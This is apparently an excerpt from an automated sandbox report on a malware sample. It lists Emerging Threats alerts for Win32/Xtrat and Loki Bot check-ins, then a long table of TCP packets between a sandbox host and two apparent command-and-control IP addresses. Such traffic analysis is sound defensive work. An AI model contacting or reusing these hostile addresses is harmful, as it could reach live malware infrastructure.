05/03/18-10:13:24.458908	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49234	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:24.908504	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49235	80	192.168.1.16	103.48.119.225
05/03/18-10:13:25.617538	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49236	80	192.168.1.16	103.48.119.225
05/03/18-10:13:26.331307	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49239	80	192.168.1.16	103.48.119.225
05/03/18-10:13:27.041217	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49240	80	192.168.1.16	103.48.119.225
05/03/18-10:13:28.218210	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49242	80	192.168.1.16	103.48.119.225
05/03/18-10:13:28.932189	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49243	80	192.168.1.16	103.48.119.225
05/03/18-10:13:29.533849	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49245	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:29.746506	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49246	80	192.168.1.16	103.48.119.225
05/03/18-10:13:30.630881	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49248	80	192.168.1.16	103.48.119.225
05/03/18-10:13:31.294577	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49249	80	192.168.1.16	103.48.119.225
05/03/18-10:13:31.971504	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49250	80	192.168.1.16	103.48.119.225
05/03/18-10:13:32.702934	TCP	2021641	ET TROJAN Loki Bot User-Agent (Charon/Inferno)	49253	80	192.168.1.16	103.48.119.225
05/03/18-10:13:34.642528	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49255	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:39.756427	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49260	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:44.824583	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49266	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:49.873333	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49270	2379	192.168.1.16	185.208.211.131
05/03/18-10:13:55.013486	TCP	2016275	ET TROJAN Win32/Xtrat.A Checkin	49275	2379	192.168.1.16	185.208.211.131

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2018 10:12:05.531501055 CEST	56975	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:05.702929974 CEST	53	56975	8.8.8.8	192.168.1.16
May 3, 2018 10:12:05.726855993 CEST	49188	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:05.726907015 CEST	80	49188	103.48.119.225	192.168.1.16
May 3, 2018 10:12:05.726968050 CEST	49188	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:05.729263067 CEST	49188	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:05.729288101 CEST	80	49188	103.48.119.225	192.168.1.16
May 3, 2018 10:12:05.729406118 CEST	49188	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:05.729420900 CEST	80	49188	103.48.119.225	192.168.1.16
May 3, 2018 10:12:06.334458113 CEST	80	49188	103.48.119.225	192.168.1.16
May 3, 2018 10:12:06.334497929 CEST	80	49188	103.48.119.225	192.168.1.16
May 3, 2018 10:12:06.334686995 CEST	49188	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:06.360709906 CEST	49188	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:06.360742092 CEST	80	49188	103.48.119.225	192.168.1.16
May 3, 2018 10:12:07.313976049 CEST	51208	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:07.372764111 CEST	53	51208	8.8.8.8	192.168.1.16
May 3, 2018 10:12:07.374636889 CEST	49189	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:07.374696016 CEST	80	49189	103.48.119.225	192.168.1.16
May 3, 2018 10:12:07.375088930 CEST	49189	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:07.377966881 CEST	49189	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:07.377998114 CEST	80	49189	103.48.119.225	192.168.1.16
May 3, 2018 10:12:07.378128052 CEST	49189	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:07.378149986 CEST	80	49189	103.48.119.225	192.168.1.16
May 3, 2018 10:12:07.797444105 CEST	80	49189	103.48.119.225	192.168.1.16
May 3, 2018 10:12:07.797662020 CEST	49189	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:07.797760963 CEST	80	49189	103.48.119.225	192.168.1.16
May 3, 2018 10:12:07.797846079 CEST	49189	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:07.962960958 CEST	62228	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:08.021006107 CEST	53	62228	8.8.8.8	192.168.1.16
May 3, 2018 10:12:08.022393942 CEST	49190	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.022433996 CEST	80	49190	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.022494078 CEST	49190	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.024533987 CEST	49190	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.024558067 CEST	80	49190	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.024674892 CEST	49190	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.024693966 CEST	80	49190	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.471345901 CEST	80	49190	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.503202915 CEST	80	49190	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.503353119 CEST	49190	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.504976034 CEST	49190	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.505023003 CEST	80	49190	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.945067883 CEST	58659	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:08.986628056 CEST	53	58659	8.8.8.8	192.168.1.16
May 3, 2018 10:12:08.987735033 CEST	49191	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.987771988 CEST	80	49191	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.989927053 CEST	49191	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.991966963 CEST	49191	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.991996050 CEST	80	49191	103.48.119.225	192.168.1.16
May 3, 2018 10:12:08.992121935 CEST	49191	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:08.992136955 CEST	80	49191	103.48.119.225	192.168.1.16
May 3, 2018 10:12:09.420301914 CEST	80	49191	103.48.119.225	192.168.1.16
May 3, 2018 10:12:09.440900087 CEST	80	49191	103.48.119.225	192.168.1.16
May 3, 2018 10:12:09.441096067 CEST	49191	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:09.443067074 CEST	49191	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:09.443095922 CEST	80	49191	103.48.119.225	192.168.1.16
May 3, 2018 10:12:10.685651064 CEST	56917	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:10.750026941 CEST	53	56917	8.8.8.8	192.168.1.16
May 3, 2018 10:12:10.754842043 CEST	49192	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:10.754915953 CEST	80	49192	103.48.119.225	192.168.1.16
May 3, 2018 10:12:10.755028963 CEST	49192	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:10.756988049 CEST	49192	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:10.757019043 CEST	80	49192	103.48.119.225	192.168.1.16
May 3, 2018 10:12:10.757178068 CEST	49192	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:10.757194996 CEST	80	49192	103.48.119.225	192.168.1.16
May 3, 2018 10:12:11.175081968 CEST	80	49192	103.48.119.225	192.168.1.16
May 3, 2018 10:12:11.175594091 CEST	49192	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:11.175707102 CEST	80	49192	103.48.119.225	192.168.1.16
May 3, 2018 10:12:11.175803900 CEST	49192	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:11.820586920 CEST	64970	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:11.868490934 CEST	53	64970	8.8.8.8	192.168.1.16
May 3, 2018 10:12:11.873646975 CEST	49193	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:11.873708010 CEST	80	49193	103.48.119.225	192.168.1.16
May 3, 2018 10:12:11.873790026 CEST	49193	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:11.876214981 CEST	49193	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:11.876245022 CEST	80	49193	103.48.119.225	192.168.1.16
May 3, 2018 10:12:11.876416922 CEST	49193	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:11.876434088 CEST	80	49193	103.48.119.225	192.168.1.16
May 3, 2018 10:12:12.302556992 CEST	80	49193	103.48.119.225	192.168.1.16
May 3, 2018 10:12:12.303183079 CEST	49193	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:12.303267956 CEST	80	49193	103.48.119.225	192.168.1.16
May 3, 2018 10:12:12.307301998 CEST	49193	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:12.529484034 CEST	54618	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:12.594268084 CEST	53	54618	8.8.8.8	192.168.1.16
May 3, 2018 10:12:12.595448017 CEST	49194	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:12.595484018 CEST	80	49194	103.48.119.225	192.168.1.16
May 3, 2018 10:12:12.595568895 CEST	49194	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:12.597477913 CEST	49194	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:12.597502947 CEST	80	49194	103.48.119.225	192.168.1.16
May 3, 2018 10:12:12.597613096 CEST	49194	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:12.597629070 CEST	80	49194	103.48.119.225	192.168.1.16
May 3, 2018 10:12:13.015059948 CEST	80	49194	103.48.119.225	192.168.1.16
May 3, 2018 10:12:13.015252113 CEST	49194	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:13.015321970 CEST	80	49194	103.48.119.225	192.168.1.16
May 3, 2018 10:12:13.015419006 CEST	49194	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:13.223141909 CEST	62396	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:13.272517920 CEST	53	62396	8.8.8.8	192.168.1.16
May 3, 2018 10:12:13.273612976 CEST	49195	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:16.291620970 CEST	49195	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:22.322542906 CEST	49195	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:34.673579931 CEST	63638	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:34.752717018 CEST	53	63638	8.8.8.8	192.168.1.16
May 3, 2018 10:12:34.754208088 CEST	49196	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:34.754256010 CEST	80	49196	103.48.119.225	192.168.1.16
May 3, 2018 10:12:34.754319906 CEST	49196	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:34.756767988 CEST	49196	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:34.756793022 CEST	80	49196	103.48.119.225	192.168.1.16
May 3, 2018 10:12:34.756993055 CEST	49196	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:34.757011890 CEST	80	49196	103.48.119.225	192.168.1.16
May 3, 2018 10:12:35.184411049 CEST	80	49196	103.48.119.225	192.168.1.16
May 3, 2018 10:12:35.184541941 CEST	49196	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:35.184623957 CEST	80	49196	103.48.119.225	192.168.1.16
May 3, 2018 10:12:35.184684038 CEST	49196	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:35.427918911 CEST	52877	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:35.488733053 CEST	53	52877	8.8.8.8	192.168.1.16
May 3, 2018 10:12:35.490494013 CEST	49197	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:37.801516056 CEST	59362	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:37.958877087 CEST	53	59362	8.8.8.8	192.168.1.16
May 3, 2018 10:12:38.511929989 CEST	49197	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:44.587825060 CEST	49197	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:57.408991098 CEST	52261	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:57.476808071 CEST	53	52261	8.8.8.8	192.168.1.16
May 3, 2018 10:12:57.477901936 CEST	49199	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:57.477965117 CEST	80	49199	103.48.119.225	192.168.1.16
May 3, 2018 10:12:57.478410959 CEST	49199	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:57.480429888 CEST	49199	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:57.480458975 CEST	80	49199	103.48.119.225	192.168.1.16
May 3, 2018 10:12:57.480568886 CEST	49199	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:57.480585098 CEST	80	49199	103.48.119.225	192.168.1.16
May 3, 2018 10:12:57.917524099 CEST	80	49199	103.48.119.225	192.168.1.16
May 3, 2018 10:12:57.917762995 CEST	49199	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:57.917924881 CEST	80	49199	103.48.119.225	192.168.1.16
May 3, 2018 10:12:57.918044090 CEST	49199	80	192.168.1.16	103.48.119.225
May 3, 2018 10:12:58.231853962 CEST	61585	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:58.282516956 CEST	53	61585	8.8.8.8	192.168.1.16
May 3, 2018 10:12:58.284549952 CEST	49200	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:00.288141012 CEST	54137	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:00.339117050 CEST	53	54137	8.8.8.8	192.168.1.16
May 3, 2018 10:13:01.291167974 CEST	49200	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:07.290848017 CEST	49200	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.432777882 CEST	52165	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:19.481487036 CEST	53	52165	8.8.8.8	192.168.1.16
May 3, 2018 10:13:19.483207941 CEST	49221	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.483262062 CEST	80	49221	103.48.119.225	192.168.1.16
May 3, 2018 10:13:19.486850977 CEST	49221	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.489872932 CEST	49221	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.489907980 CEST	80	49221	103.48.119.225	192.168.1.16
May 3, 2018 10:13:19.491066933 CEST	49221	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.491091967 CEST	80	49221	103.48.119.225	192.168.1.16
May 3, 2018 10:13:19.885210037 CEST	80	49221	103.48.119.225	192.168.1.16
May 3, 2018 10:13:19.885257959 CEST	80	49221	103.48.119.225	192.168.1.16
May 3, 2018 10:13:19.885521889 CEST	49221	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.885653019 CEST	49221	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:19.885678053 CEST	80	49221	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.082655907 CEST	52814	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:20.134543896 CEST	53	52814	8.8.8.8	192.168.1.16
May 3, 2018 10:13:20.188564062 CEST	49224	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.188656092 CEST	80	49224	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.188827991 CEST	49224	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.192783117 CEST	49224	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.192826033 CEST	80	49224	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.192995071 CEST	49224	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.193018913 CEST	80	49224	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.598864079 CEST	80	49224	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.598905087 CEST	80	49224	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.599111080 CEST	49224	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.599267006 CEST	49224	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.599306107 CEST	80	49224	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.804007053 CEST	58598	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:20.846155882 CEST	53	58598	8.8.8.8	192.168.1.16
May 3, 2018 10:13:20.848056078 CEST	49225	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.848124981 CEST	80	49225	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.850786924 CEST	49225	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.853152990 CEST	49225	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.853205919 CEST	80	49225	103.48.119.225	192.168.1.16
May 3, 2018 10:13:20.853368998 CEST	49225	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:20.853389025 CEST	80	49225	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.253159046 CEST	80	49225	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.253211021 CEST	80	49225	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.253472090 CEST	49225	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.253660917 CEST	49225	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.253700972 CEST	80	49225	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.448136091 CEST	63099	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:21.489433050 CEST	53	63099	8.8.8.8	192.168.1.16
May 3, 2018 10:13:21.491468906 CEST	49226	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.491538048 CEST	80	49226	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.491647005 CEST	49226	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.494038105 CEST	49226	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.494079113 CEST	80	49226	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.494626999 CEST	49226	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.494657040 CEST	80	49226	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.891926050 CEST	80	49226	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.892400026 CEST	49226	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:21.892582893 CEST	80	49226	103.48.119.225	192.168.1.16
May 3, 2018 10:13:21.895136118 CEST	49226	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.080895901 CEST	56190	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:22.121422052 CEST	53	56190	8.8.8.8	192.168.1.16
May 3, 2018 10:13:22.123341084 CEST	49228	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.123399019 CEST	80	49228	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.123912096 CEST	49228	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.126503944 CEST	49228	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.126539946 CEST	80	49228	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.126713037 CEST	49228	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.126728058 CEST	80	49228	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.529704094 CEST	80	49228	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.529771090 CEST	80	49228	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.530798912 CEST	49228	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.530922890 CEST	49228	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.530956030 CEST	80	49228	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.833748102 CEST	61407	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:22.895598888 CEST	53	61407	8.8.8.8	192.168.1.16
May 3, 2018 10:13:22.897634983 CEST	49230	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.897721052 CEST	80	49230	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.897830963 CEST	49230	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.901793957 CEST	49230	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.901854038 CEST	80	49230	103.48.119.225	192.168.1.16
May 3, 2018 10:13:22.902054071 CEST	49230	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:22.902086020 CEST	80	49230	103.48.119.225	192.168.1.16
May 3, 2018 10:13:23.313555956 CEST	80	49230	103.48.119.225	192.168.1.16
May 3, 2018 10:13:23.313605070 CEST	80	49230	103.48.119.225	192.168.1.16
May 3, 2018 10:13:23.313788891 CEST	49230	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:23.313913107 CEST	49230	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:23.313940048 CEST	80	49230	103.48.119.225	192.168.1.16
May 3, 2018 10:13:23.528172970 CEST	58098	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:23.597651958 CEST	53	58098	8.8.8.8	192.168.1.16
May 3, 2018 10:13:23.598803043 CEST	49231	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:23.598850965 CEST	80	49231	103.48.119.225	192.168.1.16
May 3, 2018 10:13:23.603425026 CEST	49231	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:23.605835915 CEST	49231	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:23.605869055 CEST	80	49231	103.48.119.225	192.168.1.16
May 3, 2018 10:13:23.607117891 CEST	49231	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:23.607146978 CEST	80	49231	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.027005911 CEST	80	49231	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.027050972 CEST	80	49231	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.027153969 CEST	49231	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.027260065 CEST	49231	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.027287006 CEST	80	49231	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.211774111 CEST	63129	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:24.248944998 CEST	53	63129	8.8.8.8	192.168.1.16
May 3, 2018 10:13:24.250293970 CEST	49233	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.250348091 CEST	80	49233	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.250410080 CEST	49233	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.252295971 CEST	49233	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.252329111 CEST	80	49233	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.252445936 CEST	49233	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.252461910 CEST	80	49233	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.670557976 CEST	80	49233	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.670623064 CEST	80	49233	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.670778036 CEST	49233	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.670902967 CEST	49233	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.670939922 CEST	80	49233	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.855376959 CEST	51283	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:24.903155088 CEST	53	51283	8.8.8.8	192.168.1.16
May 3, 2018 10:13:24.905294895 CEST	49235	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.905364990 CEST	80	49235	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.905477047 CEST	49235	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.908504009 CEST	49235	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.908538103 CEST	80	49235	103.48.119.225	192.168.1.16
May 3, 2018 10:13:24.908679962 CEST	49235	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:24.908698082 CEST	80	49235	103.48.119.225	192.168.1.16
May 3, 2018 10:13:25.325048923 CEST	80	49235	103.48.119.225	192.168.1.16
May 3, 2018 10:13:25.325118065 CEST	80	49235	103.48.119.225	192.168.1.16
May 3, 2018 10:13:25.325298071 CEST	49235	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:25.325459957 CEST	49235	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:25.325505972 CEST	80	49235	103.48.119.225	192.168.1.16
May 3, 2018 10:13:25.562110901 CEST	65348	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:25.610450029 CEST	53	65348	8.8.8.8	192.168.1.16
May 3, 2018 10:13:25.612139940 CEST	49236	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:25.612234116 CEST	80	49236	103.48.119.225	192.168.1.16
May 3, 2018 10:13:25.615150928 CEST	49236	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:25.617537975 CEST	49236	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:25.617594957 CEST	80	49236	103.48.119.225	192.168.1.16
May 3, 2018 10:13:25.619164944 CEST	49236	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:25.619204998 CEST	80	49236	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.028583050 CEST	80	49236	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.028645992 CEST	80	49236	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.028738022 CEST	49236	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.028848886 CEST	49236	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.028881073 CEST	80	49236	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.273636103 CEST	64405	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:26.326611042 CEST	53	64405	8.8.8.8	192.168.1.16
May 3, 2018 10:13:26.328675985 CEST	49239	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.328727007 CEST	80	49239	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.328859091 CEST	49239	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.331306934 CEST	49239	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.331329107 CEST	80	49239	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.331573963 CEST	49239	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.331589937 CEST	80	49239	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.747256041 CEST	80	49239	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.747311115 CEST	80	49239	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.747459888 CEST	49239	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.747576952 CEST	49239	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:26.747601986 CEST	80	49239	103.48.119.225	192.168.1.16
May 3, 2018 10:13:26.976149082 CEST	52216	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:27.036655903 CEST	53	52216	8.8.8.8	192.168.1.16
May 3, 2018 10:13:27.038619041 CEST	49240	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:27.038712025 CEST	80	49240	103.48.119.225	192.168.1.16
May 3, 2018 10:13:27.038827896 CEST	49240	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:27.041217089 CEST	49240	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:27.041277885 CEST	80	49240	103.48.119.225	192.168.1.16
May 3, 2018 10:13:27.043303013 CEST	49240	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:27.043340921 CEST	80	49240	103.48.119.225	192.168.1.16
May 3, 2018 10:13:27.919224977 CEST	80	49240	103.48.119.225	192.168.1.16
May 3, 2018 10:13:27.919316053 CEST	80	49240	103.48.119.225	192.168.1.16
May 3, 2018 10:13:27.921471119 CEST	49240	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:27.921652079 CEST	49240	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:27.921690941 CEST	80	49240	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.147000074 CEST	50621	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:28.213378906 CEST	53	50621	8.8.8.8	192.168.1.16
May 3, 2018 10:13:28.215351105 CEST	49242	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.215408087 CEST	80	49242	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.215503931 CEST	49242	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.218209982 CEST	49242	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.218244076 CEST	80	49242	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.218419075 CEST	49242	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.218442917 CEST	80	49242	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.638801098 CEST	80	49242	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.638864040 CEST	80	49242	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.639080048 CEST	49242	80	192.168.1.16	103.48.119.225
